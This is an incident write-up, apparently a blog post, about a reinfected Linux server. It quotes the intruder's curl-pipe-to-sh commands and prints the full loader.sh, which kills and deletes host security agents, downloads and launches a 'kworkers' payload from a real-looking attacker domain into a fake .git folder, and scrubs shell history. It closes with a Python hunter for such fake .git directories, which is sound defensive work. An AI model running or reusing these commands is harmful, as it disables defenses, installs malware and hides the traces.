This machine had been infected by a trojan before; I cleaned it up by hand and, thinking it was fine, did not reinstall the system.
Today I found it had been logged into again and two commands had been executed:
sh -c 'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh'
sh -c \'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh\'
Too bad for them: neither command succeeded, because I had blocked the machine's access to the external network.
I downloaded loader.sh with a browser; the script is as follows:
# Find running security/monitoring agents by name, resolve each binary's directory and delete it
ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs dirname | xargs rm -rf
# Kill the agent processes (loose substring matches: 'edr' or 'Yun' hits any process whose line contains them)
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs -I {} kill -9 {}
### Here are the server's monitoring programs; the intruder wants to delete the monitoring programs on our machine
rm -rf /usr/local/xxx
rm -rf /usr/local/xxxx
rm -rf /usr/local/xxxx
# Kill any earlier copy of the payload; it runs as 'kworkers', a name chosen to blend in with the kernel's kworker threads
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs -I {} kill -9 {}
# Download host; the payload is dropped into a fake .git directory in $HOME (or the current directory) to look harmless
domainroota=m.windowsupdatesupport.org
mkdir ~/.git
mkdir ./.git
gitdir=~/.git
if [ -d ~/.git ]; then
gitdir=~/.git
fi
if [ -d ./.git ]; then
gitdir=./.git
fi
curl http://$domainroota/d/kworkers -o $gitdir/kworkers
chmod 777 $gitdir/kworkers
# Inside a container run in the foreground; otherwise detach with nohup and log into the fake .git directory
if [ -e /.dockerenv ]
then
$gitdir/kworkers
else
nohup $gitdir/kworkers >>$gitdir/.log&
fi
# Anti-forensics: tries to strip bash_history lines mentioning the domain (the single quotes keep $domainroota from expanding, so check the history anyway)
sed -i '/$domainroota/d' ~/.bash_history
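The loader's persistence trick is to park an executable in a bare ~/.git or ./.git that is not a real repository. The following hunt for that artifact is an added example, not part of the original post; the fixture directories and the placeholder file contents are constructed, and the heuristic (a .git directory lacking HEAD/objects/refs but holding an executable or world-writable file) is my own.

```python
import os
import stat
import tempfile
from pathlib import Path

# A real .git directory always carries these; a bare "mkdir ~/.git" never does.
REAL_GIT_MARKERS = ("HEAD", "objects", "refs")


def is_real_git_dir(gitdir: Path) -> bool:
    return all((gitdir / m).exists() for m in REAL_GIT_MARKERS)


def suspicious_files(gitdir: Path) -> list:
    """Top-level files in a .git dir that are executable or world-writable (chmod 777)."""
    hits = []
    for p in gitdir.iterdir():
        if p.is_file():
            mode = p.stat().st_mode
            if mode & 0o111 or mode & stat.S_IWOTH:
                hits.append(p.name)
    return sorted(hits)


def hunt_fake_git_dirs(root) -> list:
    """Walk root and report .git directories that are not repositories but hold a payload."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        if ".git" not in dirnames:
            continue
        dirnames.remove(".git")  # do not descend into .git itself
        gitdir = Path(dirpath) / ".git"
        if is_real_git_dir(gitdir):
            continue
        bad = suspicious_files(gitdir)
        if bad:
            findings.append((str(gitdir), bad))
    return findings


def demo() -> list:
    """Constructed fixture (not data from the incident host): one real repo, one fake .git."""
    root = Path(tempfile.mkdtemp())
    real = root / "project" / ".git"
    (real / "objects").mkdir(parents=True)
    (real / "refs").mkdir()
    (real / "HEAD").write_text("ref: refs/heads/main\n")
    fake = root / "home" / ".git"  # what the loader's "mkdir ~/.git" leaves behind
    fake.mkdir(parents=True)
    (fake / "kworkers").write_bytes(b"placeholder bytes, not the real binary")
    (fake / "kworkers").chmod(0o777)  # mirrors the loader's chmod 777
    return hunt_fake_git_dirs(root)
```

Run hunt_fake_git_dirs("/") on a suspect host to list every fake .git directory; a genuine repository is skipped even if it contains hook scripts.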
Copyright © 2003-2013 www.wpsshop.cn. All rights reserved.